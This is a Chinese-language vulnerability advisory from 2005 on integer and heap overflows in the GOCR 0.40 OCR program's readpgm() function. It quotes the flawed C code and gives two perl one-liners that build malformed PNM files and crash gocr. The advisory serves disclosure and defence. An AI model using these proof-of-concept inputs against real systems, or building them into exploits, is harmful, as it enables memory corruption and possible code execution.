安全研究

安全漏洞
GOCR多个缓冲区溢出漏洞

发布日期:2005-04-18
更新日期:2005-04-18

受影响系统:
sourceforge GOCR 0.40
描述:
BUGTRAQ  ID: 13197
CVE(CAN) ID: CVE-2005-1141,CVE-2005-1142

GOCR是一款在GNU公共许可下开发的光学字符识别(OCR)程序。

GOCR中存在本地可利用的堆溢出和整数溢出,可能允许攻击者执行任意代码。

1 readpgm()整数溢出

GOCR在读取特制的PNM文件时存在整数溢出,可能导致堆溢出。有漏洞的代码存在于使用netpbm库的readpgm()函数中:

src/pnm.c:
...
/*
   for simplicity only PAM of netpbm is used, the older formats
   PBM, PGM and PPM can be handled implicitly by PAM routines (js05)
*/
#ifdef HAVE_PAM_H
void readpgm(char *name, pix * p, int vvv) {
  ...
  /* read pgm */
  pnm_readpaminit(fp, &inpam, sizeof(inpam));

  p->x = inpam.width;
  p->y = inpam.height;
  if ( !(p->p = (unsigned char *)malloc(p->x*p->y)) )
    F1("Error at malloc: p->p: %d bytes", p->x*p->y);
  ...
  for ( i=0; i < inpam.height; i++ ) {
    pnm_readpamrow(&inpam, tuplerow);
    for ( j = 0; j < inpam.width; j++ ) {
      ...
      p->p[i*inpam.width+j] = sample;
      ...
    }
  }
}

如果p->x*p->y溢出了整数变量,攻击者就可以为图形缓冲区分配不充分的内存。

2 readpgm()堆溢出

GOCR在读取特制的纯PNM文件(P3格式)时存在堆溢出。有漏洞的代码存在于不使用netpbm库的readpgm()库中:

src/pnm.c:

/*
   if PAM not installed, here is the fallback routine,
   which is not so powerful
*/
void readpgm(char *name,pix *p,int vvv){
...
pic=(unsigned char *)malloc( nx*ny );
...
  if( c2=='3' )for(mod=k=j=i=0;i<nx*ny*3 && !feof(f1);){
    c1=read_char(f1);
    if( !isdigit(c1) ) {  if( !isspace(c1) )F0("unexpected char");
      if(1&mod) { k+=j; if(mod==5){ pic[i]=k/3; i++; }
        j=0; mod=(mod+1)%6; }  }
    else { j=j*10+c1-'0'; if(!(mod&1)) mod++; };
  }
...

pic向量大小仅为nx*ny个元素,但“i<nx*ny*3 && !feof(f1)”时循环结束,因此如果文件有更多字节的话pic向量可能溢出。

<*来源:Overflow.pl (adv@overflow.pl
  
  链接:http://www.overflow.pl/adv/gocr.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

整数溢出:

bash-2.05b$ perl -e 'print "P3\n4 1073741825\n255\n"; print "0 "x1024' >
vuln.pnm bash-2.05b$ ./gocr vuln.pnm
Segmentation fault (core dumped)

堆溢出:

bash-2.05b$ perl -e 'print "P3\n10 10\n255\n"; print "0 "x1024' > vuln.pnm
bash-2.05b$ ./gocr vuln.pnm
Segmentation fault (core dumped)

建议:
厂商补丁:

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://jocr.sourceforge.net/index.html

浏览次数:2707
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障